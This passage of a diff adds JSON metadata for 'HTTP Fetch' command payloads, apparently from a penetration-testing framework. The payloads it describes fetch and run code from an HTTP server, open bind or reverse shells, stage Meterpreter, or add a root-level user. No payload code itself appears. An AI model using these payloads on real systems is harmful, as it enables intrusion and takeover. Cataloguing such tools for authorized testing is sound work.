"targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/http/x64/meterpreter/reverse_sctp": { + "name": "HTTP Fetch, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Brent Cook ", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/http/x64/meterpreter/reverse_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x64/meterpreter/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + 
"Brendan Watters", + "Brent Cook ", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to the attacker", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/meterpreter", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_http": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_http", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_https": { + "name": "HTTP Fetch", + 
"fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_https", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_https", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_https", + "staged": false + }, + "payload_cmd/linux/http/x64/meterpreter_reverse_tcp": { + "name": "HTTP Fetch", + "fullname": "payload/cmd/linux/http/x64/meterpreter_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Adam Cammack ", + "Brent Cook ", + "timwr" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/meterpreter_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/meterpreter_reverse_tcp", + "staged": false + }, + 
"payload_cmd/linux/http/x64/pingback_bind_tcp": { + "name": "HTTP Fetch, Linux x64 Pingback, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x64/pingback_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nAccept a connection from attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/pingback_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/pingback_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/pingback_reverse_tcp": { + "name": "HTTP Fetch, Linux x64 Pingback, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x64/pingback_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "bwatters-r7" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and report UUID (Linux x64)", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/pingback_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + 
"payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/pingback_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell/bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nListen for a connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/bind_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/bind_tcp" + }, + "payload_cmd/linux/http/x64/shell/reverse_sctp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse SCTP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/reverse_sctp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "RageLtMan " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + 
"is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/reverse_sctp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/reverse_sctp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_sctp" + }, + "payload_cmd/linux/http/x64/shell/reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Stager", + "fullname": "payload/cmd/linux/http/x64/shell/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky", + "tkmru" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a command shell (staged).\n\nConnect back to the attacker", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell/reverse_tcp", + "staged": true, + "stage_refname": "linux/x64/shell", + "stager_refname": "linux/x64/reverse_tcp" + }, + "payload_cmd/linux/http/x64/shell_bind_ipv6_tcp": { + "name": "HTTP Fetch, Linux x64 Command Shell, Bind TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x64/shell_bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen 
for an IPv6 connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_bind_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Inline", + "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nListen for a connection and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_bind_tcp_random_port": { + "name": "HTTP Fetch, Linux Command Shell, Bind TCP Random Port Inline", + "fullname": "payload/cmd/linux/http/x64/shell_bind_tcp_random_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + 
"author": [ + "Brendan Watters", + "Geyslan G. Bem " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\n\n Listen for a connection in a random port and spawn a command shell.\n Use nmap to discover the open port: 'nmap -sS target -p-'.", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/tiny_shell_bind_tcp_random_port_x86_64.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_bind_tcp_random_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_bind_tcp_random_port", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_find_port": { + "name": "HTTP Fetch, Linux Command Shell, Find Port Inline", + "fullname": "payload/cmd/linux/http/x64/shell_find_port", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "mak" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nSpawn a shell on an established connection", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_find_port", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": 
"linux/x64/shell_find_port", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_reverse_ipv6_tcp": { + "name": "HTTP Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6)", + "fullname": "payload/cmd/linux/http/x64/shell_reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "epi " + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell over IPv6", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_reverse_ipv6_tcp", + "staged": false + }, + "payload_cmd/linux/http/x64/shell_reverse_tcp": { + "name": "HTTP Fetch, Linux Command Shell, Reverse TCP Inline", + "fullname": "payload/cmd/linux/http/x64/shell_reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "ricky" + ], + "description": "Fetch and execute an x64 payload from an HTTP server.\nConnect back to attacker and spawn a command shell", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-05-25 11:49:38 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x64.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x64/shell_reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + 
"notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x64", + "adapted_refname": "linux/x64/shell_reverse_tcp", + "staged": false + }, + "payload_cmd/linux/http/x86/adduser": { + "name": "HTTP Fetch, Linux Add User", + "fullname": "payload/cmd/linux/http/x86/adduser", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "skape ", + "vlad902 ", + "spoonm " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nCreate a new user with UID 0", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/adduser", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/adduser", + "staged": false + }, + "payload_cmd/linux/http/x86/chmod": { + "name": "HTTP Fetch, Linux Chmod", + "fullname": "payload/cmd/linux/http/x86/chmod", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nRuns chmod on specified file with specified mode", + "references": [], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/chmod", + "check": false, + "post_auth": false, 
+ "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/chmod", + "staged": false + }, + "payload_cmd/linux/http/x86/exec": { + "name": "HTTP Fetch, Linux Execute Command", + "fullname": "payload/cmd/linux/http/x86/exec", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "vlad902 ", + "Geyslan G. Bem " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nExecute an arbitrary command or just a /bin/sh shell", + "references": [ + "URL-https://github.com/geyslan/SLAE/blob/master/4th.assignment/tiny_execve_sh.asm", + "URL-https://github.com/geyslan/SLAE/blob/master/improvements/x86_execve_dyn.asm" + ], + "platform": "Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/exec", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/exec", + "staged": false + }, + "payload_cmd/linux/http/x86/generic/debug_trap": { + "name": "HTTP Fetch, Generic x86 Debug Trap", + "fullname": "payload/cmd/linux/http/x86/generic/debug_trap", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "robert " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a debug trap in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, 
+ "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/generic/debug_trap", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "generic/debug_trap", + "staged": false + }, + "payload_cmd/linux/http/x86/generic/tight_loop": { + "name": "HTTP Fetch, Generic x86 Tight Loop", + "fullname": "payload/cmd/linux/http/x86/generic/tight_loop", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "jduck " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nGenerate a tight loop in the target process", + "references": [], + "platform": "BSD,BSDi,Linux,OSX,Solaris,Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/generic/tight_loop", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "generic/tight_loop", + "staged": false + }, + "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp": { + "name": "HTTP Fetch, Bind IPv6 TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt " + ], + "description": "Fetch and execute a 
x86 payload from an HTTP server.\nListen for an IPv6 connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid": { + "name": "HTTP Fetch, Bind IPv6 TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for an IPv6 connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_ipv6_tcp_uuid", + 
"staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_ipv6_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_nonx_tcp": { + "name": "HTTP Fetch, Bind TCP Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_nonx_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_nonx_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_tcp": { + "name": "HTTP Fetch, Bind TCP Stager (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": 
"/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp" + }, + "payload_cmd/linux/http/x86/meterpreter/bind_tcp_uuid": { + "name": "HTTP Fetch, Bind TCP Stager with UUID Support (Linux x86)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape ", + "egypt ", + "OJ Reeves" + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nListen for a connection with UUID Support (Linux x86)", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/bind_tcp_uuid", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/bind_tcp_uuid" + }, + "payload_cmd/linux/http/x86/meterpreter/find_tag": { + "name": "HTTP Fetch, Find Tag Stager", + "fullname": "payload/cmd/linux/http/x86/meterpreter/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", 
+ "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "skape " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nUse an established connection", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": "linux/x86/meterpreter/find_tag", + "staged": true, + "stage_refname": "linux/x86/meterpreter", + "stager_refname": "linux/x86/find_tag" + }, + "payload_cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp": { + "name": "HTTP Fetch, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Brendan Watters", + "Spencer McIntyre", + "William Webb ", + "kris katterjohn " + ], + "description": "Fetch and execute a x86 payload from an HTTP server.\nConnect back to attacker over IPv6", + "references": [], + "platform": "Linux,Linux", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2023-06-09 16:47:45 +0000", + "path": "/modules/payloads/adapters/cmd/linux/http/x86.rb", + "is_install_path": true, + "ref_name": "cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/linux/http/x86", + "adapted_refname": 
